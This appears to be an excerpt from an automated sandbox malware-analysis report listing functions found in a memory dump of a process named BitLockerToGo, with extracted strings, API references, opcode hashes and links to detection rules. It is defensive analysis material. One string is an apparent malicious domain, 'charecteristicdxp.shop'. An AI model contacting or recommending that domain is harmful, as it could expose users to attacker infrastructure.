API ID: InitializeThunk
String ID: %6):$+g.+$,Q
API String ID: 2994545307-2237917708
Opcode ID: a2f88ead73d0f5880693ca8f74fa8a2c7c92faf6dc3e7b867b538d344f1adaf7
Instruction ID: 1a9c355fa3c8503fc9fa266424bdf092bf14dd4b7891ee132af180b84e8be828
Opcode Fuzzy Hash: a2f88ead73d0f5880693ca8f74fa8a2c7c92faf6dc3e7b867b538d344f1adaf7
Instruction Fuzzy Hash: 3AB104B06483058BD711DF18C8C1B6BB7E2EF95354F18892EE5C587391E339D885CB9A

Function 0040A8F0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

0, xrefs: 0040A95A
.-, xrefs: 0040ADD3
2, xrefs: 0040AB17

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: .-$0$2
API String ID: 0-2268152719
Opcode ID: 8a84842b191c141ccc9f6aee9ed1e520d1dadd58ac91d282251e5ec9eddf7ed3
Instruction ID: cf1edf293c88697046367dd6132fe467e89864c0b9e0a597458fd548be6c796c
Opcode Fuzzy Hash: 8a84842b191c141ccc9f6aee9ed1e520d1dadd58ac91d282251e5ec9eddf7ed3
Instruction Fuzzy Hash: A8E153B020C3809BD314DF19C490A2FBBE1EF86748F148A2DE0D99B392C7399855CB5B

Function 004125CD Relevance: 4.1, Strings: 3, Instructions: 332COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00412690
QS, xrefs: 00412ACA
UW, xrefs: 00412AC3

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$QS$UW
API String ID: 0-1480531348
Opcode ID: c52d6de2f6c0ffbfbd45bc1819287c53e111937e025e50ec9397b0e925e72159
Instruction ID: 46b4ccbfc9229f7400cf746b520090b5b864cc0a96276ba3108584e497049a31
Opcode Fuzzy Hash: c52d6de2f6c0ffbfbd45bc1819287c53e111937e025e50ec9397b0e925e72159
Instruction Fuzzy Hash: 9FB157B4610B41CBD324CF28D590B63B7F1FF49301F549A6DD48A8BAA2D774B891CB58

Function 0041E7D0 Relevance: 4.0, Strings: 3, Instructions: 207COMMON

Download Yara Rule

Strings

8I&W, xrefs: 0041E7E7
,Q?_, xrefs: 0041E7F7
q]Z[, xrefs: 0041E7FF

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ,Q?_$8I&W$q]Z[
API String ID: 0-149757026
Opcode ID: 2bbfead9b315ebe20ddb0595978af02672f7e3200d8c95fee402d3500629300e
Instruction ID: dfe1e1731f720bad543312ad13fec382bcb0c73510cc5a36fa481b731f7d1b3b
Opcode Fuzzy Hash: 2bbfead9b315ebe20ddb0595978af02672f7e3200d8c95fee402d3500629300e
Instruction Fuzzy Hash: 0F8100B410C3419BD354DF1AD490A1FBBE1AF8A388F508D1DE4D9972A1C734D992CF5A

Function 0041922D Relevance: 3.4, APIs: 2, Instructions: 440libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 004193CD
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 004193F4

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 831f6583a1ca67d32667d03c13194c004292baacb589541755794c5f8aaab154
Instruction ID: f55f7a43427254533481e54e2018684c80d74b8c6f04d75cdfeaa4fc475eac46
Opcode Fuzzy Hash: 831f6583a1ca67d32667d03c13194c004292baacb589541755794c5f8aaab154
Instruction Fuzzy Hash: 82F18A75618302DFD708CF24E890BAAB3E5FB89304F19487DE885972A0D335ED55CB5A

Function 00406300 Relevance: 3.3, Strings: 2, Instructions: 804COMMON

Download Yara Rule

Strings

0, xrefs: 00406C23
8, xrefs: 00406C1B

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 3c16e846eb746ad2493bfee1c407fbaa43541968678fa0bf59dc7af2f7afabbd
Instruction ID: a01cd1a6d4c01ceb9a2fbb573586704edbc94f9b76ca3cd27e0a3352e4cde723
Opcode Fuzzy Hash: 3c16e846eb746ad2493bfee1c407fbaa43541968678fa0bf59dc7af2f7afabbd
Instruction Fuzzy Hash: 917238716083409FD710CF18C890B5BBBE1BF88318F15892EF98A9B391D379D959CB96

Function 00434E94 Relevance: 3.2, Strings: 2, Instructions: 670COMMON

Download Yara Rule

Strings

RVC, xrefs: 00435644
RC, xrefs: 00435360

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: RVC$RC
API String ID: 0-2238833574
Opcode ID: 6baa8108255e1740fb45f5162ce0273977177c053093d57baa086b7743258536
Instruction ID: ea2921fb4c64b1f8e8db6d83284f94043605dff1de39cebfd36c2614a403e637
Opcode Fuzzy Hash: 6baa8108255e1740fb45f5162ce0273977177c053093d57baa086b7743258536
Instruction Fuzzy Hash: AF32E53560C7528FC315CF28C89052ABBE2AFCA314F1986BED8A58B3A2D735DD41CB55

Function 00433040 Relevance: 3.1, Strings: 2, Instructions: 602COMMON

Download Yara Rule

Strings

onqp, xrefs: 004331C6
onqp, xrefs: 0043307B

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: onqp$onqp
API String ID: 0-2464386876
Opcode ID: cb5cd2e5d169a2549702e9e6be285a6908d528ed7118af9dc2246c5c906ff50c
Instruction ID: f6af288a21f242107bc84dab00878a5f938d1006390bcf40353fb08210906619
Opcode Fuzzy Hash: cb5cd2e5d169a2549702e9e6be285a6908d528ed7118af9dc2246c5c906ff50c
Instruction Fuzzy Hash: EF12AB7420C3419FC714CF18C890A2FBBE2BB89709F289A2EF49587391D779D945CB5A

Function 0040E726 Relevance: 2.9, Strings: 2, Instructions: 379COMMON

Download Yara Rule

Strings

Ud, xrefs: 0040E401
4`[b, xrefs: 0040E686

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$Ud
API String ID: 0-2598648935
Opcode ID: df375e487ad11b6e40b1951669128ba498ef26c42443eea8fff92bf06ad04837
Instruction ID: a3988a839e24b2e783efa284363407f5ad0d7566717200b4c418682322c8019c
Opcode Fuzzy Hash: df375e487ad11b6e40b1951669128ba498ef26c42443eea8fff92bf06ad04837
Instruction Fuzzy Hash: A5F177B0900B01AFD324DF25DA56756BBB1FF46304F508A2DE4AA2BB90D335A425CFD6

Function 0042F2E0 Relevance: 2.9, Strings: 2, Instructions: 372COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0042F6C0
:, xrefs: 0042F396

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$:
API String ID: 0-3617602732
Opcode ID: d7d99a885e0a39f4e2be7439c5b03087341b2a3b517b3203e0692c61096e2980
Instruction ID: 15d0fdc3ec5f4d9bc1c43993fa9b975bef1d8e9c4097206cb9b84da1e18a2995
Opcode Fuzzy Hash: d7d99a885e0a39f4e2be7439c5b03087341b2a3b517b3203e0692c61096e2980
Instruction Fuzzy Hash: CBB10F706083019BD318EF14E891B2FB7E2EF85308F948A3DE5C5473A1D3799859CB9A

Function 0041E0E3 Relevance: 2.8, Strings: 2, Instructions: 294COMMON

Download Yara Rule

Strings

"A, xrefs: 0041E187
A, xrefs: 0041E17F

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "A$A
API String ID: 0-57944010
Opcode ID: 7673526033146375ed24f451d6ecb6bba2a9016436eb890efa2e123b389ea0f5
Instruction ID: 4d633b38375cdb8ccb255be0c811808dee8aefa414f5e730a34621040b862a8c
Opcode Fuzzy Hash: 7673526033146375ed24f451d6ecb6bba2a9016436eb890efa2e123b389ea0f5
Instruction Fuzzy Hash: 1EA11631A08380CFD3148F39E85175ABBE2BF8A324F198A6DE8E49B291D335DD55CB45

Function 0040DFAA Relevance: 2.8, Strings: 2, Instructions: 266COMMON

Download Yara Rule

Strings

ULQP, xrefs: 0040DFB6
charecteristicdxp.shop, xrefs: 0040E25C

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ULQP$charecteristicdxp.shop
API String ID: 0-3388748295
Opcode ID: 83af4ee34dc6cd5b3db1cbe58457862e18f81bdf6cb252268781d939032e2faa
Instruction ID: fb8b457bf5fe8c9295b9cc027b53f649586e8476c7c698f00274c0d6d6dd0f8a
Opcode Fuzzy Hash: 83af4ee34dc6cd5b3db1cbe58457862e18f81bdf6cb252268781d939032e2faa
Instruction Fuzzy Hash: D2914C70104290CFD725CF2AC1E0622BBF1EF5A300B28999DC9D65F796C37AA855CBA5

Function 004368B0 Relevance: 2.6, Strings: 2, Instructions: 150COMMON

Download Yara Rule

Strings

@, xrefs: 0043696E
789:, xrefs: 0043698E

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: 789:$@
API String ID: 2994545307-436671146
Opcode ID: 04c585d53e173414bc420b4403701a14fd54a58cd40641154be5c2d61845671a
Instruction ID: 7579e5bfa21611b7686aaf86140f8ee9002a19dc07c432b35d7594b0c187991e
Opcode Fuzzy Hash: 04c585d53e173414bc420b4403701a14fd54a58cd40641154be5c2d61845671a
Instruction Fuzzy Hash: 304127705083019BC704DF18C890B2BB7F1EF99318F15D62DE999573A1E7399904CB8A

Function 00436E60 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

@, xrefs: 00436ECD
789:, xrefs: 00436F16

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: 789:$@
API String ID: 2994545307-436671146
Opcode ID: 4f6b850a42f8872865661284ce37ac77203352137dc84c271c7adc8dfbbefe2f
Instruction ID: 4b3e2bc09452e535580c3e88d57ee33e475ede77c12d53c840a4ec8a0e806e91
Opcode Fuzzy Hash: 4f6b850a42f8872865661284ce37ac77203352137dc84c271c7adc8dfbbefe2f
Instruction Fuzzy Hash: CF317C755083019BC300DF18D4C0A2BFBF5EF99308F15992DE98887390D339A919CBAA

Function 00435C30 Relevance: 1.9, Strings: 1, Instructions: 619COMMON

Download Yara Rule

Strings

2_C, xrefs: 00435F26

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 2_C
API String ID: 0-173586781
Opcode ID: 0a10e0f70abde7cb88d795a1677db051eec0b902035f6d35c5eae3925f675c85
Instruction ID: bf6685d6075f0687346f812eeb6a94898047b69b84638e22225f351cfb296a3f
Opcode Fuzzy Hash: 0a10e0f70abde7cb88d795a1677db051eec0b902035f6d35c5eae3925f675c85
Instruction Fuzzy Hash: 6F22ED35608205CFD704DF28D99021AB7E2FF8A314F19897EE9D587391D739E911CB86

Function 00435A60 Relevance: 1.8, Strings: 1, Instructions: 573COMMON

Download Yara Rule

Strings

2_C, xrefs: 00435F26

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 2_C
API String ID: 0-173586781
Opcode ID: 76ffc47b413a849192d09a2a9e7823aa0b53c770a9b8a8fa64541650fe536f2c
Instruction ID: e18b5a670fab76d3ee9c4019be2d8033613dddf0d5b812fd6c4f53b3fea8b611
Opcode Fuzzy Hash: 76ffc47b413a849192d09a2a9e7823aa0b53c770a9b8a8fa64541650fe536f2c
Instruction Fuzzy Hash: 5112AC39608251CFD744DF28D98061AB7E2FF8A315F1A897DD68987361C339E861CF86

Function 00435B50 Relevance: 1.8, Strings: 1, Instructions: 540COMMON

Download Yara Rule

Strings

2_C, xrefs: 00435F26

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 2_C
API String ID: 0-173586781
Opcode ID: 861dfb22173243b0d3d5d9b65ca4800714aeb00bd5f5fa17870d811d1fba1574
Instruction ID: 33b8456e19ea317b5907566bf65dc91d6f534915c8dffc1fe375b7936154bea0
Opcode Fuzzy Hash: 861dfb22173243b0d3d5d9b65ca4800714aeb00bd5f5fa17870d811d1fba1574
Instruction Fuzzy Hash: 04029B3960C251CFD744DF28D98061AB7E2FF8A314F1A896DE68987361C335E861CF86

Function 00418690 Relevance: 1.7, APIs: 1, Instructions: 246comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00439538,00000000,00000001,00439528), ref: 004186B9

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 192448cbd8a085ec3730bd85a470a20f94390267f3cbda770a6b67f183bfc07c
Instruction ID: 3ea0a5cad9d1f41498779c6ab5c0350f9e412167ce5754ad0d4b4617999b147f
Opcode Fuzzy Hash: 192448cbd8a085ec3730bd85a470a20f94390267f3cbda770a6b67f183bfc07c
Instruction Fuzzy Hash: 4C51BFB56002049BDB20AB24CC86BA773B4FF85354F18451DF9958B391EB79D881C76A

Function 00420100 Relevance: 1.7, Strings: 1, Instructions: 414COMMON

Download Yara Rule

Strings

", xrefs: 004203F8

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 30a78cbef3a386f754aff9bd746b5f9701720c316e24a2d4be0e80dc9bc322b2
Instruction ID: 381db9e5e5dd0e8789a45db24fee0836b49e3e68fa0981d4f40337ebf5c49050
Opcode Fuzzy Hash: 30a78cbef3a386f754aff9bd746b5f9701720c316e24a2d4be0e80dc9bc322b2
Instruction Fuzzy Hash: 2CD1F4B2B08320AFD724CE25D44076BB7E56F84354F588A2FE89987383E738DD458796

Function 004188F0 Relevance: 1.6, Strings: 1, Instructions: 367COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00418C70

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b
API String ID: 0-3962175265
Opcode ID: 82bbfbf735bc5152967097496ca4308d2e3c2fc4bf8fe2c4187b4e48abcf3b21
Instruction ID: 5d2c8393f1ebd53a1b79d8354658a2cd24b0affc3cc9f7eab08734d9c14c2504
Opcode Fuzzy Hash: 82bbfbf735bc5152967097496ca4308d2e3c2fc4bf8fe2c4187b4e48abcf3b21
Instruction Fuzzy Hash: 0791D2B15083009BD710AF14C892BBBB3E1EF95354F18491EF9859B391E779ED80C7AA

Function 00437580 Relevance: 1.6, Strings: 1, Instructions: 305COMMON

Download Yara Rule

Strings

789:, xrefs: 004375B6

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 789:
API String ID: 0-2924019492
Opcode ID: 057645529b7d95ba1364da6d9da8e5fa6f0feb253ff1f77ef5fce0b0a7e3d238
Instruction ID: ec34da27251ff034885db29d1be4b6a0ff01ae46e8f2541a75d29bb3cd34841d
Opcode Fuzzy Hash: 057645529b7d95ba1364da6d9da8e5fa6f0feb253ff1f77ef5fce0b0a7e3d238
Instruction Fuzzy Hash: 4A91A1B86083429BC724DF18C490A2BB3E2EF89754F19992DE8C58B351E735EC51CB96

Function 00437290 Relevance: 1.6, Strings: 1, Instructions: 300COMMON

Download Yara Rule

Strings

789:, xrefs: 004372C6

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 789:
API String ID: 0-2924019492
Opcode ID: b9f3c458fcf7543717e29f53a37437ddf2ec1c089d3e60566645bbf7a252c131
Instruction ID: 60392fe36b65da6d69fcc0453249946f736db215680a548f7fe148790c0c1dbe
Opcode Fuzzy Hash: b9f3c458fcf7543717e29f53a37437ddf2ec1c089d3e60566645bbf7a252c131
Instruction Fuzzy Hash: 3481D0B56083019BC728DF04C880A2BB7B2EF99750F19992DE9C547361E735EC01CB9A

Function 004075B0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 004076E6

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 30262e9433a6b4999526016ea34f822655c4c1180ff78b12f3afa12e8681e29e
Instruction ID: e026263bf3a39f3713dd7a458ef92c9f0a87e9d5dd3c5907aadc607f4dc0be06
Opcode Fuzzy Hash: 30262e9433a6b4999526016ea34f822655c4c1180ff78b12f3afa12e8681e29e
Instruction Fuzzy Hash: 95B1377150C7819FD321DF18C88065BBBE0AFA9704F488E2EE5D997382D635E918CB67

Function 00435730 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

2YC, xrefs: 00435924

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 2YC
API String ID: 0-1543642843
Opcode ID: 170d0a255632ff36a85f5a378e7ff4ea97541c5be9ae3809bedd0ec11d66748e
Instruction ID: f121bec572687cfe9a4584950d3fde8ca31b26d1275e92533cf5b60f0438ff0c
Opcode Fuzzy Hash: 170d0a255632ff36a85f5a378e7ff4ea97541c5be9ae3809bedd0ec11d66748e
Instruction Fuzzy Hash: FC81CC79A09216CFCB00DF58D89066FF7B1FF8A315F1A486EC98667351C334A821CB95

Function 004205C0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 004207BE

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 72652d408997fe27c90472f9a68d17a1d1f3bbc4c429160b60dcc66235be3a33
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 1C71F932B083255BD714CE2DD48031FBBE2ABC5710F99896FE4949B352D379DC458B8A

Function 004132B0 Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

qrs, xrefs: 0041337E

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: qrs
API String ID: 0-2859022563
Opcode ID: 370c73c3ea22c191fe56408b6d64400e64d08fc6dce61bda7e6bccc24127c0af
Instruction ID: 9e7ce0de7029fc8b8f9b86a2077e3c04064acef33432f39685ca1ef4b489f4cc
Opcode Fuzzy Hash: 370c73c3ea22c191fe56408b6d64400e64d08fc6dce61bda7e6bccc24127c0af
Instruction Fuzzy Hash: 8A41F1B45083049BD3109F19C851BABB7F4EF86751F040A1DF8859B391E778EA50CBAA

Function 00410961 Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

PA, xrefs: 00410A6D, 00410A7A

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: PA
API String ID: 0-1139031533
Opcode ID: 63df7e322ca4fe1862196d2722731df4837f814d1ea9028095211c11073ef4a4
Instruction ID: c01492848bf94dc0d6b213ec9b5cace8f4638def16130db58e1fcbb941f95f21
Opcode Fuzzy Hash: 63df7e322ca4fe1862196d2722731df4837f814d1ea9028095211c11073ef4a4
Instruction Fuzzy Hash: 3D41BCB1910700CFD7249F21E881A23B7F5BFA9318F14593EE087926A2E775F895CB49

Function 004101D2 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

PA, xrefs: 004112FD

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: PA
API String ID: 0-1139031533
Opcode ID: 5439818eb85c1efc3d632b19ba054f1736587b22f94c7d896ebe6a70239bd44e
Instruction ID: 500f860ac827ab87c372ab24da1a9022da3c688837c42ee2eda060fc8b4bfbb3
Opcode Fuzzy Hash: 5439818eb85c1efc3d632b19ba054f1736587b22f94c7d896ebe6a70239bd44e
Instruction Fuzzy Hash: 7E319AB0600B018FD735CF55D480AA7B3F1AB95300F108A6ED586A7BA1E738F885CB99

Function 00436A60 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

789:, xrefs: 00436A98

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 789:
API String ID: 0-2924019492
Opcode ID: 90733d9d45b8e0529eb7a0684829cdc24ce6b11f79802cdcfb1916c95a7d6041
Instruction ID: ed5f9adf3e76027b8aa14f5fdc0d1254678e1ddebb45f1e38933489ef94253c3
Opcode Fuzzy Hash: 90733d9d45b8e0529eb7a0684829cdc24ce6b11f79802cdcfb1916c95a7d6041
Instruction Fuzzy Hash: 85219C75608342ABC714CF04C980A6FBBE2EBCA704F25D91EE8949B341D334EC41CB9A

Function 0041F318 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0041F3A0

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b
API String ID: 0-3962175265
Opcode ID: 2b24d61ee04f70eecd1aa3abdab3dfb04d5fac8abe7b4f95f7996cd109f201b4
Instruction ID: 912edd409759454766d75e375c89156e97a46410a5a498b5a8762cbd5aa52a0a
Opcode Fuzzy Hash: 2b24d61ee04f70eecd1aa3abdab3dfb04d5fac8abe7b4f95f7996cd109f201b4
Instruction Fuzzy Hash: A1115EB4608241CBD708DF05D4A097FF7A2FF96304F14992ED59607361D3369896CB9A

Function 00408BF0 Relevance: .8, Instructions: 780COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7b79400f2891f3ca7bcbf904612f65ed7951afcc3568987032124c1fcb0295a
Instruction ID: f726b18a32d12277c0e51689e27fa42a747f75d3af6547ab6d3b4dcb2b4a765f
Opcode Fuzzy Hash: d7b79400f2891f3ca7bcbf904612f65ed7951afcc3568987032124c1fcb0295a
Instruction Fuzzy Hash: 1442D3316087118BC7249F29D88067BB3E2FFD4305F198A3ED5C6972C6E739A855CB46

Function 004043B0 Relevance: .7, Instructions: 729COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 556fe521f47e662149f621d8db7e8fddefbb72edb92505995588db59dd35c07f
Instruction ID: 9d856ed3e18f478c09756e45a4b8e9446a5b85ef3d2911df5296cf089ca325c4
Opcode Fuzzy Hash: 556fe521f47e662149f621d8db7e8fddefbb72edb92505995588db59dd35c07f
Instruction Fuzzy Hash: 4552D2B16087429FC708CF29C090666FBE1BFC9314F18867EE599A7781D738E855CB89

Function 00404E50 Relevance: .6, Instructions: 623COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9de8b202b89f411a1b0284df8a3091bc694a2453b0ade5929337b88950ea70b
Instruction ID: b47fa689f6be0a5610cab5d7afa91086f90f2266766864de7894d819b569a54a
Opcode Fuzzy Hash: d9de8b202b89f411a1b0284df8a3091bc694a2453b0ade5929337b88950ea70b
Instruction Fuzzy Hash: F7422570515B118FC328CE29C68066BB7F2FF85310BA04A2ED69797F90D67AB841CF58

Function 00407020 Relevance: .5, Instructions: 482COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9878d676c97663cf386a58a360d9f0106325cdd740686c42ce5d53719522335
Instruction ID: e350efd9d748051badd92efac713e570d664021594a22223c7f08d0225f4c024
Opcode Fuzzy Hash: c9878d676c97663cf386a58a360d9f0106325cdd740686c42ce5d53719522335
Instruction Fuzzy Hash: 29F1E5356087408FC724CF29C88166BFBE6EFD9304F08892EE4D997791E679E904CB56

Function 00407964 Relevance: .4, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

